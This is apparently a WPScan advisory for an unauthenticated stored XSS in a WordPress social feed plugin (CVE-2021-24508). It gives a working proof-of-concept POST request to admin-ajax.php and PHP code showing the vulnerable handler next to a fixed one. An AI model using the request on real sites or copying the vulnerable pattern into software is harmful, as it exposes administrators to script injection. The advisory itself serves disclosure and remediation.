WPScan

WordPress Plugin Vulnerabilities

Smash Balloon Social Post Feed < 2.19.2 - Unauthenticated Stored XSS

Description

The plugin does not sanitise or escape the feedID POST parameter in its feed_locator AJAX action (available to both authenticated and unauthenticated users) before outputting a truncated version of it in the admin dashboard, leading to an unauthenticated Stored Cross-Site Scripting issue that executes in the context of a logged-in administrator who views the affected admin page.

Proof of Concept

For the attack to be successful, the following requirements need to be met:
- Max payload size: 31 characters (the value is truncated to this length before output)
- feedID parameter length must be greater than 31 characters to trigger the echo of unescaped data
- The shortCodeAtts parameter value must be unique

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 192
Connection: close

action=feed_locator&feedLocatorData[0][feedID]=<img%20src%20onerror=alert(/XSS/)>&feedLocatorData[0][shortCodeAtts]=uniq1234&feedLocatorData[0][postID]=1&feedLocatorData[0][location]=footer

XSS will be triggered at https://example.com/wp-admin/admin.php?page=cff-top&tab=allfeeds
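As an added illustrative example (not the plugin's own code, all names are hypothetical), the pattern the description refers to, a nopriv AJAX handler that stores feedID verbatim and an admin page that echoes a truncated copy, shown beside the corrected handling: sanitise on input, escape on output. It assumes feed identifiers are simple tokens, so sanitize_key() is an acceptable input filter.

```php
<?php
// Added illustrative example with hypothetical names; not code from the plugin.
// Vulnerable pattern: feedID arrives via admin-ajax.php from any visitor
// (wp_ajax_nopriv_ hook) and is stored as-is, then echoed truncated in wp-admin.
function demo_feed_locator_vulnerable() {
    $data = isset( $_POST['feedLocatorData'] ) ? (array) $_POST['feedLocatorData'] : array();
    foreach ( $data as $entry ) {
        $feed_id = isset( $entry['feedID'] ) ? $entry['feedID'] : '';
        // No sanitisation before storage.
        update_option( 'demo_feed_locations', array( 'feedID' => $feed_id ) );
    }
    wp_die();
}

function demo_render_feed_list_vulnerable() {
    $rows = get_option( 'demo_feed_locations', array() );
    // Truncation is not a defence: a short tag still fits inside 31 characters,
    // and the value is written to the page without escaping.
    echo substr( $rows['feedID'], 0, 31 ) . '...';
}

// Hardened pattern: accept only what the feature needs, strip slashes WordPress
// adds to request data, sanitise before storing, and escape at the point of output.
function demo_feed_locator_fixed() {
    $raw  = isset( $_POST['feedLocatorData'] ) ? wp_unslash( $_POST['feedLocatorData'] ) : array();
    foreach ( (array) $raw as $entry ) {
        // sanitize_key() keeps only [a-z0-9_-], so no markup can be stored.
        $feed_id = isset( $entry['feedID'] ) ? sanitize_key( $entry['feedID'] ) : '';
        if ( '' === $feed_id ) {
            continue;
        }
        update_option( 'demo_feed_locations', array( 'feedID' => $feed_id ) );
    }
    wp_die();
}

function demo_render_feed_list_fixed() {
    $rows    = get_option( 'demo_feed_locations', array() );
    $feed_id = isset( $rows['feedID'] ) ? (string) $rows['feedID'] : '';
    // Escape regardless of what was stored; defence in depth if storage changes later.
    echo esc_html( mb_substr( $feed_id, 0, 31 ) ) . '...';
}

add_action( 'wp_ajax_demo_feed_locator', 'demo_feed_locator_fixed' );
add_action( 'wp_ajax_nopriv_demo_feed_locator', 'demo_feed_locator_fixed' );
```

If unauthenticated callers do not genuinely need this action, dropping the wp_ajax_nopriv_ registration removes the unauthenticated entry point entirely.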

Affects Plugins

custom-facebook-feed
Fixed in version 2.19.2

References

CVE
CVE-2021-24508

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID
2b543740-d4b0-49b5-a021-454a3a72162f

Timeline

Publicly Published

2021-08-16

Added

2021-08-16

Last Updated

2022-04-08
